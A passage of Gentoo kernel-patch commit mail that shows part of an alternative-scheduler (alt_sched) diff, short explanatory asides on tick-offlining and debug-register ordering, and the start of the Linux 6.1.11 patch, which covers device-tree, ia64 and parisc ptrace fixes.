 +	WARN_ON_ONCE(is_migration_disabled(p));
 +#endif
-+	if (task_cpu(p) == new_cpu)
-+		return;
 +	trace_sched_migrate_task(p, new_cpu);
-+	rseq_migrate(p);
-+	perf_event_task_migrate(p);
++
++	if (task_cpu(p) != new_cpu)
++	{
++		rseq_migrate(p);
++		perf_event_task_migrate(p);
++	}
 +
 +	__set_task_cpu(p, new_cpu);
 +}
@@ -2163,7 +2187,7 @@ index 000000000000..4bea0c025475
 +
 +	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
 +	dequeue_task(p, rq, 0);
-+	update_sched_rq_watermark(rq);
++	update_sched_preempt_mask(rq);
 +	set_task_cpu(p, new_cpu);
 +	raw_spin_unlock(&rq->lock);
 +
@@ -2525,23 +2549,50 @@ index 000000000000..4bea0c025475
 +	return dest_cpu;
 +}
 +
++static inline void
++sched_preempt_mask_flush(cpumask_t *mask, int prio)
++{
++	int cpu;
++
++	cpumask_copy(mask, sched_idle_mask);
++
++	for_each_cpu_not(cpu, mask) {
++		if (prio < cpu_rq(cpu)->prio)
++			cpumask_set_cpu(cpu, mask);
++	}
++}
++
++static inline int
++preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
++{
++	int task_prio = task_sched_prio(p);
++	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
++	int pr = atomic_read(&sched_prio_record);
++
++	if (pr != task_prio) {
++		sched_preempt_mask_flush(mask, task_prio);
++		atomic_set(&sched_prio_record, task_prio);
++	}
++
++	return cpumask_and(preempt_mask, allow_mask, mask);
++}
++
 +static inline int select_task_rq(struct task_struct *p)
 +{
-+	cpumask_t chk_mask, tmp;
++	cpumask_t allow_mask, mask;
 +
-+	if (unlikely(!cpumask_and(&chk_mask, p->cpus_ptr, cpu_active_mask)))
++	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
 +		return select_fallback_rq(task_cpu(p), p);
 +
 +	if (
 +#ifdef CONFIG_SCHED_SMT
-+	    cpumask_and(&tmp, &chk_mask, &sched_sg_idle_mask) ||
++	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
 +#endif
-+	    cpumask_and(&tmp, &chk_mask, sched_rq_watermark) ||
-+	    cpumask_and(&tmp, &chk_mask,
-+			sched_rq_watermark + SCHED_QUEUE_BITS - 1 - task_sched_prio(p)))
-+		return best_mask_cpu(task_cpu(p), &tmp);
++	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
++	    preempt_mask_check(p, &allow_mask, &mask))
++		return best_mask_cpu(task_cpu(p), &mask);
 +
-+	return best_mask_cpu(task_cpu(p), &chk_mask);
++	return best_mask_cpu(task_cpu(p), &allow_mask);
 +}
 +
 +void sched_set_stop_task(int cpu, struct task_struct *stop)
@@ -4678,12 +4729,12 @@ index 000000000000..4bea0c025475
 +	 * find potential cpus which can migrate the current running task
 +	 */
 +	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
-+	    cpumask_andnot(&chk, cpu_online_mask, sched_rq_watermark) &&
++	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
 +	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
 +		int i;
 +
 +		for_each_cpu_wrap(i, &chk, cpu) {
-+			if (cpumask_subset(cpu_smt_mask(i), &chk) &&
++			if (!cpumask_intersects(cpu_smt_mask(i), sched_idle_mask) &&\
 +			    sg_balance_trigger(i))
 +				return;
 +		}
@@ -4806,6 +4857,7 @@ index 000000000000..4bea0c025475
 +static void sched_tick_stop(int cpu)
 +{
 +	struct tick_work *twork;
++	int os;
 +
 +	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
 +		return;
@@ -4813,7 +4865,10 @@ index 000000000000..4bea0c025475
 +	WARN_ON_ONCE(!tick_work_cpu);
 +
 +	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	cancel_delayed_work_sync(&twork->work);
++	/* There cannot be competing actions, but don't rely on stop-machine. */
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_OFFLINING);
++	WARN_ON_ONCE(os != TICK_SCHED_REMOTE_RUNNING);
++	/* Don't cancel, as this would mess up the state machine. */
 +}
 +#endif /* CONFIG_HOTPLUG_CPU */
 +
@@ -4988,7 +5043,7 @@ index 000000000000..4bea0c025475
 +{
 +	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
 +	       sched_rq_pending_mask.bits[0],
-+	       sched_rq_watermark[0].bits[0],
++	       sched_idle_mask->bits[0],
 +	       sched_sg_idle_mask.bits[0]);
 +}
 +#else
@@ -5060,15 +5115,15 @@ index 000000000000..4bea0c025475
 +				if (src_rq->nr_running < 2)
 +					cpumask_clear_cpu(i, &sched_rq_pending_mask);
 +
++				spin_release(&src_rq->lock.dep_map, _RET_IP_);
++				do_raw_spin_unlock(&src_rq->lock);
++
 +				rq->nr_running += nr_migrated;
 +				if (rq->nr_running > 1)
 +					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
 +
 +				cpufreq_update_util(rq, 0);
 +
-+				spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+				do_raw_spin_unlock(&src_rq->lock);
-+
 +				return 1;
 +			}
 +
@@ -5097,7 +5152,7 @@ index 000000000000..4bea0c025475
 +}
 +
 +static inline struct task_struct *
-+choose_next_task(struct rq *rq, int cpu, struct task_struct *prev)
++choose_next_task(struct rq *rq, int cpu)
 +{
 +	struct task_struct *next;
 +
@@ -5254,7 +5309,7 @@ index 000000000000..4bea0c025475
 +			prev->sched_contributes_to_load =
 +				(prev_state & TASK_UNINTERRUPTIBLE) &&
 +				!(prev_state & TASK_NOLOAD) &&
-+				!(prev->flags & TASK_FROZEN);
++				!(prev_state & TASK_FROZEN);
 +
 +			if (prev->sched_contributes_to_load)
 +				rq->nr_uninterruptible++;
@@ -5284,7 +5339,7 @@ index 000000000000..4bea0c025475
 +
 +	check_curr(prev, rq);
 +
-+	next = choose_next_task(rq, cpu, prev);
++	next = choose_next_task(rq, cpu);
 +	clear_tsk_need_resched(prev);
 +	clear_preempt_need_resched();
 +#ifdef CONFIG_SCHED_DEBUG
@@ -5293,7 +5348,7 @@ index 000000000000..4bea0c025475
 +
 +	if (likely(prev != next)) {
 +		if (deactivated)
-+			update_sched_rq_watermark(rq);
++			update_sched_preempt_mask(rq);
 +		next->last_ran = rq->clock_task;
 +		rq->last_ts_switch = rq->clock;
 +
@@ -5714,6 +5769,7 @@ index 000000000000..4bea0c025475
 +		return;
 +
 +	rq = __task_access_lock(p, &lock);
++	update_rq_clock(rq);
 +	/*
 +	 * Set under pi_lock && rq->lock, such that the value can be used under
 +	 * either lock.
@@ -6593,6 +6649,13 @@ index 000000000000..4bea0c025475
 +	return retval;
 +}
 +
++#ifdef CONFIG_SMP
++int dl_task_check_affinity(struct task_struct *p, const struct cpumask *mask)
++{
++	return 0;
++}
++#endif
++
 +static int
 +__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
 +{
@@ -7431,7 +7494,6 @@ index 000000000000..4bea0c025475
 +
 +	raw_spin_lock_irqsave(&idle->pi_lock, flags);
 +	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
 +
 +	idle->last_ran = rq->clock_task;
 +	idle->__state = TASK_RUNNING;
@@ -7978,6 +8040,14 @@ index 000000000000..4bea0c025475
 +
 +	sched_smp_initialized = true;
 +}
++
++static int __init migration_init(void)
++{
++	sched_cpu_starting(smp_processor_id());
++	return 0;
++}
++early_initcall(migration_init);
++
 +#else
 +void __init sched_init_smp(void)
 +{
@@ -8030,7 +8100,7 @@ index 000000000000..4bea0c025475
 +
 +#ifdef CONFIG_SMP
 +	for (i = 0; i < SCHED_QUEUE_BITS; i++)
-+		cpumask_copy(sched_rq_watermark + i, cpu_present_mask);
++		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
 +#endif
 +
 +#ifdef CONFIG_CGROUP_SCHED
@@ -8044,7 +8114,7 @@ index 000000000000..4bea0c025475
 +		rq = cpu_rq(i);
 +
 +		sched_queue_init(&rq->queue);
-+		rq->watermark = IDLE_TASK_SCHED_PRIO;
++		rq->prio = IDLE_TASK_SCHED_PRIO;
 +		rq->skip = NULL;
 +
 +		raw_spin_lock_init(&rq->lock);
@@ -8587,14 +8657,15 @@ index 000000000000..1212a031700e
 +{}
 diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
 new file mode 100644
-index 000000000000..7c1cc0cbca0d
+index 000000000000..c32403ed82b6
 --- /dev/null
 +++ b/kernel/sched/alt_sched.h
-@@ -0,0 +1,660 @@
+@@ -0,0 +1,668 @@
 +#ifndef ALT_SCHED_H
 +#define ALT_SCHED_H
 +
 +#include <linux/context_tracking.h>
++#include <linux/profile.h>
 +#include <linux/psi.h>
 +#include <linux/stop_machine.h>
 +#include <linux/syscalls.h>
@@ -8732,7 +8803,7 @@ index 000000000000..7c1cc0cbca0d
 +#ifdef CONFIG_SCHED_PDS
 +	u64			time_edge;
 +#endif
-+	unsigned long watermark;
++	unsigned long prio;
 +
 +	/* switch count */
 +	u64 nr_switches;
@@ -8997,17 +9068,24 @@ index 000000000000..7c1cc0cbca0d
 +}
 +
 +static inline void
-+rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
++rq_unlock(struct rq *rq, struct rq_flags *rf)
 +	__releases(rq->lock)
 +{
-+	raw_spin_unlock_irq(&rq->lock);
++	raw_spin_unlock(&rq->lock);
 +}
 +
 +static inline void
-+rq_unlock(struct rq *rq, struct rq_flags *rf)
++rq_lock_irq(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irq(&rq->lock);
++}
++
++static inline void
++rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
 +	__releases(rq->lock)
 +{
-+	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irq(&rq->lock);
 +}
 +
 +static inline struct rq *
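
A note on the sched_tick_stop() hunk above: cancelling the delayed work synchronously would fight the work item's own state machine, so the r4 patch (matching mainline) flips an atomic state word to TICK_SCHED_REMOTE_OFFLINING instead and lets the queued work observe it and stop re-arming itself. A toy model of that handoff, with simplified names that are not the kernel's:

    /*
     * Toy model of the offlining handshake in sched_tick_stop() above:
     * hotplug flips a state word and returns; the periodic worker
     * notices and stops re-arming itself.
     */
    #include <stdatomic.h>

    enum tick_state { TICK_RUNNING, TICK_OFFLINING, TICK_OFFLINE };

    static _Atomic enum tick_state state = TICK_RUNNING;

    /* Worker side: called at the end of each invocation; returns 1 if
     * the work should queue itself again. */
    static int tick_work_rearm(void)
    {
            if (atomic_load(&state) == TICK_OFFLINING) {
                    atomic_store(&state, TICK_OFFLINE); /* acknowledge */
                    return 0;                           /* stop re-arming */
            }
            return 1;
    }

    /* Hotplug side: request the stop without waiting for the worker. */
    static void tick_stop(void)
    {
            enum tick_state os = atomic_exchange(&state, TICK_OFFLINING);
            /* "There cannot be competing actions": the worker must still
             * have been running, hence the kernel's WARN_ON_ONCE. */
            (void)os;
    }

The WARN_ON_ONCE in the real hunk encodes exactly that "no competing actions" assumption: at the moment hotplug requests the stop, the work must still be in the running state.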


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-09 12:34 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-09 12:34 UTC (permalink / raw)
  To: gentoo-commits

commit:     d50fc37ec2f4ea158c45d728d05b5e3231502e41
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  9 12:33:53 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  9 12:33:53 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=d50fc37e

Linux patch 6.1.11

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1010_linux-6.1.11.patch | 8663 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 8667 insertions(+)
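
One instructive fix inside the 6.1.11 patch below is the x86 debug-register change: DR7 reads and writes become asm volatile with a __FORCE_ORDER operand, because a DR7 access can raise a #VC exception under SEV-ES and the compiler had reordered the read in the NMI handler to before sev_es_ist_enter(), causing stack recursion. The idiom, reduced to a stand-alone toy (force_order here is a stand-in for the kernel's __FORCE_ORDER macro, and these are not the kernel's actual accessors):

    /*
     * Toy reduction of the DR7 ordering fix below. The volatile
     * qualifier plus the dummy "m"(force_order) operand gives the asm
     * a side effect and a fake memory dependency, so the compiler can
     * neither elide the access nor freely move it around.
     */
    static unsigned long force_order;

    static inline unsigned long read_dr7(void)
    {
            unsigned long val;

            asm volatile("mov %%db7, %0" : "=r" (val) : "m" (force_order));
            return val;
    }

    static inline void write_dr7(unsigned long val)
    {
            asm volatile("mov %0, %%db7" : : "r" (val), "m" (force_order));
    }

Roughly, volatile forbids deleting or caching the access, while the shared dummy "m" operand gives these asm statements a common dependency the optimizer has to order against.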

diff --git a/0000_README b/0000_README
index 10671afd..1fb22543 100644
--- a/0000_README
+++ b/0000_README
@@ -83,6 +83,10 @@ Patch:  1009_linux-6.1.10.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.10
 
+Patch:  1010_linux-6.1.11.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.11
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1010_linux-6.1.11.patch b/1010_linux-6.1.11.patch
new file mode 100644
index 00000000..e101abaf
--- /dev/null
+++ b/1010_linux-6.1.11.patch
@@ -0,0 +1,8663 @@
+diff --git a/Makefile b/Makefile
+index 6e34c942744e3..e039f2af17722 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 10
++SUBLEVEL = 11
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/imx7d-smegw01.dts b/arch/arm/boot/dts/imx7d-smegw01.dts
+index 546268b8d0b13..c0f00f5db11e1 100644
+--- a/arch/arm/boot/dts/imx7d-smegw01.dts
++++ b/arch/arm/boot/dts/imx7d-smegw01.dts
+@@ -198,6 +198,7 @@
+ &usbotg2 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_usbotg2>;
++	over-current-active-low;
+ 	dr_mode = "host";
+ 	status = "okay";
+ };
+@@ -374,7 +375,7 @@
+ 
+ 	pinctrl_usbotg2: usbotg2grp {
+ 		fsl,pins = <
+-			MX7D_PAD_UART3_RTS_B__USB_OTG2_OC	0x04
++			MX7D_PAD_UART3_RTS_B__USB_OTG2_OC	0x5c
+ 		>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8dxl.dtsi b/arch/arm64/boot/dts/freescale/imx8dxl.dtsi
+index 5ddbda0b4def0..f2c4d13b2f3c1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8dxl.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8dxl.dtsi
+@@ -157,7 +157,7 @@
+ 
+ 		sc_pwrkey: keys {
+ 			compatible = "fsl,imx8qxp-sc-key", "fsl,imx-sc-key";
+-			linux,keycode = <KEY_POWER>;
++			linux,keycodes = <KEY_POWER>;
+ 			wakeup-source;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-pinfunc.h b/arch/arm64/boot/dts/freescale/imx8mm-pinfunc.h
+index 83c8f715cd901..b1f11098d248e 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-pinfunc.h
++++ b/arch/arm64/boot/dts/freescale/imx8mm-pinfunc.h
+@@ -602,7 +602,7 @@
+ #define MX8MM_IOMUXC_UART1_RXD_GPIO5_IO22                                   0x234 0x49C 0x000 0x5 0x0
+ #define MX8MM_IOMUXC_UART1_RXD_TPSMP_HDATA24                                0x234 0x49C 0x000 0x7 0x0
+ #define MX8MM_IOMUXC_UART1_TXD_UART1_DCE_TX                                 0x238 0x4A0 0x000 0x0 0x0
+-#define MX8MM_IOMUXC_UART1_TXD_UART1_DTE_RX                                 0x238 0x4A0 0x4F4 0x0 0x0
++#define MX8MM_IOMUXC_UART1_TXD_UART1_DTE_RX                                 0x238 0x4A0 0x4F4 0x0 0x1
+ #define MX8MM_IOMUXC_UART1_TXD_ECSPI3_MOSI                                  0x238 0x4A0 0x000 0x1 0x0
+ #define MX8MM_IOMUXC_UART1_TXD_GPIO5_IO23                                   0x238 0x4A0 0x000 0x5 0x0
+ #define MX8MM_IOMUXC_UART1_TXD_TPSMP_HDATA25                                0x238 0x4A0 0x000 0x7 0x0
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw72xx-0x-rs232-rts.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw72xx-0x-rs232-rts.dts
+index 3ea73a6886ff4..f6ad1a4b8b665 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw72xx-0x-rs232-rts.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw72xx-0x-rs232-rts.dts
+@@ -33,7 +33,6 @@
+ 	pinctrl-0 = <&pinctrl_uart2>;
+ 	rts-gpios = <&gpio5 29 GPIO_ACTIVE_LOW>;
+ 	cts-gpios = <&gpio5 28 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx-0x-rs232-rts.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx-0x-rs232-rts.dts
+index 2fa635e1c1a82..1f8ea20dfafcb 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx-0x-rs232-rts.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx-0x-rs232-rts.dts
+@@ -33,7 +33,6 @@
+ 	pinctrl-0 = <&pinctrl_uart2>;
+ 	rts-gpios = <&gpio5 29 GPIO_ACTIVE_LOW>;
+ 	cts-gpios = <&gpio5 28 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx.dtsi
+index 244ef8d6cc688..7761d5671cb13 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx.dtsi
+@@ -222,7 +222,6 @@
+ 	pinctrl-0 = <&pinctrl_uart3>, <&pinctrl_bten>;
+ 	cts-gpios = <&gpio5 8 GPIO_ACTIVE_LOW>;
+ 	rts-gpios = <&gpio5 9 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ 
+ 	bluetooth {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts
+index 72311b55f06da..5a770c8b777e9 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts
+@@ -721,7 +721,6 @@
+ 	dtr-gpios = <&gpio1 14 GPIO_ACTIVE_LOW>;
+ 	dsr-gpios = <&gpio1 1 GPIO_ACTIVE_LOW>;
+ 	dcd-gpios = <&gpio1 11 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+@@ -737,7 +736,6 @@
+ 	pinctrl-0 = <&pinctrl_uart3>, <&pinctrl_uart3_gpio>;
+ 	cts-gpios = <&gpio4 10 GPIO_ACTIVE_LOW>;
+ 	rts-gpios = <&gpio4 9 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+@@ -746,7 +744,6 @@
+ 	pinctrl-0 = <&pinctrl_uart4>, <&pinctrl_uart4_gpio>;
+ 	cts-gpios = <&gpio5 11 GPIO_ACTIVE_LOW>;
+ 	rts-gpios = <&gpio5 12 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7902.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7902.dts
+index 31f4c735fe4f0..ba0b3f507855c 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7902.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7902.dts
+@@ -651,7 +651,6 @@
+ 	pinctrl-0 = <&pinctrl_uart1>, <&pinctrl_uart1_gpio>;
+ 	rts-gpios = <&gpio4 10 GPIO_ACTIVE_LOW>;
+ 	cts-gpios = <&gpio4 24 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+@@ -668,7 +667,6 @@
+ 	pinctrl-0 = <&pinctrl_uart3>, <&pinctrl_uart3_gpio>;
+ 	rts-gpios = <&gpio2 1 GPIO_ACTIVE_LOW>;
+ 	cts-gpios = <&gpio2 0 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ 
+ 	bluetooth {
+@@ -686,7 +684,6 @@
+ 	dtr-gpios = <&gpio4 3 GPIO_ACTIVE_LOW>;
+ 	dsr-gpios = <&gpio4 4 GPIO_ACTIVE_LOW>;
+ 	dcd-gpios = <&gpio4 6 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts
+index 19f6d2943d26c..8e861b920d09e 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts
+@@ -572,7 +572,6 @@
+ 	dtr-gpios = <&gpio1 0 GPIO_ACTIVE_LOW>;
+ 	dsr-gpios = <&gpio1 1 GPIO_ACTIVE_LOW>;
+ 	dcd-gpios = <&gpio3 24 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+index bcab830c6e95e..59445f916d7fa 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+@@ -98,6 +98,7 @@
+ 		off-on-delay = <500000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_reg_eth>;
++		regulator-always-on;
+ 		regulator-boot-on;
+ 		regulator-max-microvolt = <3300000>;
+ 		regulator-min-microvolt = <3300000>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn-venice-gw7902.dts b/arch/arm64/boot/dts/freescale/imx8mn-venice-gw7902.dts
+index dd4302ac1de46..e7362d7615bd1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn-venice-gw7902.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mn-venice-gw7902.dts
+@@ -631,7 +631,6 @@
+ 	pinctrl-0 = <&pinctrl_uart3>, <&pinctrl_uart3_gpio>;
+ 	rts-gpios = <&gpio2 1 GPIO_ACTIVE_LOW>;
+ 	cts-gpios = <&gpio2 0 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ 
+ 	bluetooth {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-venice-gw74xx.dts b/arch/arm64/boot/dts/freescale/imx8mp-venice-gw74xx.dts
+index 06b4c93c58765..d68ef4f0726f0 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-venice-gw74xx.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mp-venice-gw74xx.dts
+@@ -611,7 +611,6 @@
+ 	pinctrl-0 = <&pinctrl_uart3>, <&pinctrl_uart3_gpio>;
+ 	cts-gpios = <&gpio3 21 GPIO_ACTIVE_LOW>;
+ 	rts-gpios = <&gpio3 22 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ 
+ 	bluetooth {
+diff --git a/arch/ia64/kernel/sys_ia64.c b/arch/ia64/kernel/sys_ia64.c
+index 215bf3f8cb204..4f24910cfe73f 100644
+--- a/arch/ia64/kernel/sys_ia64.c
++++ b/arch/ia64/kernel/sys_ia64.c
+@@ -170,6 +170,9 @@ ia64_mremap (unsigned long addr, unsigned long old_len, unsigned long new_len, u
+ asmlinkage long
+ ia64_clock_getres(const clockid_t which_clock, struct __kernel_timespec __user *tp)
+ {
++	struct timespec64 rtn_tp;
++	s64 tick_ns;
++
+ 	/*
+ 	 * ia64's clock_gettime() syscall is implemented as a vdso call
+ 	 * fsys_clock_gettime(). Currently it handles only
+@@ -185,8 +188,8 @@ ia64_clock_getres(const clockid_t which_clock, struct __kernel_timespec __user *
+ 	switch (which_clock) {
+ 	case CLOCK_REALTIME:
+ 	case CLOCK_MONOTONIC:
+-		s64 tick_ns = DIV_ROUND_UP(NSEC_PER_SEC, local_cpu_data->itc_freq);
+-		struct timespec64 rtn_tp = ns_to_timespec64(tick_ns);
++		tick_ns = DIV_ROUND_UP(NSEC_PER_SEC, local_cpu_data->itc_freq);
++		rtn_tp = ns_to_timespec64(tick_ns);
+ 		return put_timespec64(&rtn_tp, tp);
+ 	}
+ 
+diff --git a/arch/parisc/kernel/firmware.c b/arch/parisc/kernel/firmware.c
+index a115315d88e69..bd325f2b5349e 100644
+--- a/arch/parisc/kernel/firmware.c
++++ b/arch/parisc/kernel/firmware.c
+@@ -1303,7 +1303,7 @@ static char iodc_dbuf[4096] __page_aligned_bss;
+  */
+ int pdc_iodc_print(const unsigned char *str, unsigned count)
+ {
+-	unsigned int i;
++	unsigned int i, found = 0;
+ 	unsigned long flags;
+ 
+ 	count = min_t(unsigned int, count, sizeof(iodc_dbuf));
+@@ -1315,6 +1315,7 @@ int pdc_iodc_print(const unsigned char *str, unsigned count)
+ 			iodc_dbuf[i+0] = '\r';
+ 			iodc_dbuf[i+1] = '\n';
+ 			i += 2;
++			found = 1;
+ 			goto print;
+ 		default:
+ 			iodc_dbuf[i] = str[i];
+@@ -1330,7 +1331,7 @@ print:
+ 		__pa(pdc_result), 0, __pa(iodc_dbuf), i, 0);
+ 	spin_unlock_irqrestore(&pdc_lock, flags);
+ 
+-	return i;
++	return i - found;
+ }
+ 
+ #if !defined(BOOTLOADER)
+diff --git a/arch/parisc/kernel/ptrace.c b/arch/parisc/kernel/ptrace.c
+index 96ef6a6b66e56..9af11abeee4f6 100644
+--- a/arch/parisc/kernel/ptrace.c
++++ b/arch/parisc/kernel/ptrace.c
+@@ -126,6 +126,12 @@ long arch_ptrace(struct task_struct *child, long request,
+ 	unsigned long tmp;
+ 	long ret = -EIO;
+ 
++	unsigned long user_regs_struct_size = sizeof(struct user_regs_struct);
++#ifdef CONFIG_64BIT
++	if (is_compat_task())
++		user_regs_struct_size /= 2;
++#endif
++
+ 	switch (request) {
+ 
+ 	/* Read the word at location addr in the USER area.  For ptraced
+@@ -166,7 +172,7 @@ long arch_ptrace(struct task_struct *child, long request,
+ 		     addr >= sizeof(struct pt_regs))
+ 			break;
+ 		if (addr == PT_IAOQ0 || addr == PT_IAOQ1) {
+-			data |= 3; /* ensure userspace privilege */
++			data |= PRIV_USER; /* ensure userspace privilege */
+ 		}
+ 		if ((addr >= PT_GR1 && addr <= PT_GR31) ||
+ 				addr == PT_IAOQ0 || addr == PT_IAOQ1 ||
+@@ -181,14 +187,14 @@ long arch_ptrace(struct task_struct *child, long request,
+ 		return copy_regset_to_user(child,
+ 					   task_user_regset_view(current),
+ 					   REGSET_GENERAL,
+-					   0, sizeof(struct user_regs_struct),
++					   0, user_regs_struct_size,
+ 					   datap);
+ 
+ 	case PTRACE_SETREGS:	/* Set all gp regs in the child. */
+ 		return copy_regset_from_user(child,
+ 					     task_user_regset_view(current),
+ 					     REGSET_GENERAL,
+-					     0, sizeof(struct user_regs_struct),
++					     0, user_regs_struct_size,
+ 					     datap);
+ 
+ 	case PTRACE_GETFPREGS:	/* Get the child FPU state. */
+@@ -285,7 +291,7 @@ long compat_arch_ptrace(struct task_struct *child, compat_long_t request,
+ 			if (addr >= sizeof(struct pt_regs))
+ 				break;
+ 			if (addr == PT_IAOQ0+4 || addr == PT_IAOQ1+4) {
+-				data |= 3; /* ensure userspace privilege */
++				data |= PRIV_USER; /* ensure userspace privilege */
+ 			}
+ 			if (addr >= PT_FR0 && addr <= PT_FR31 + 4) {
+ 				/* Special case, fp regs are 64 bits anyway */
+@@ -302,6 +308,11 @@ long compat_arch_ptrace(struct task_struct *child, compat_long_t request,
+ 			}
+ 		}
+ 		break;
++	case PTRACE_GETREGS:
++	case PTRACE_SETREGS:
++	case PTRACE_GETFPREGS:
++	case PTRACE_SETFPREGS:
++		return arch_ptrace(child, request, addr, data);
+ 
+ 	default:
+ 		ret = compat_ptrace_request(child, request, addr, data);
+@@ -483,7 +494,7 @@ static void set_reg(struct pt_regs *regs, int num, unsigned long val)
+ 	case RI(iaoq[0]):
+ 	case RI(iaoq[1]):
+ 			/* set 2 lowest bits to ensure userspace privilege: */
+-			regs->iaoq[num - RI(iaoq[0])] = val | 3;
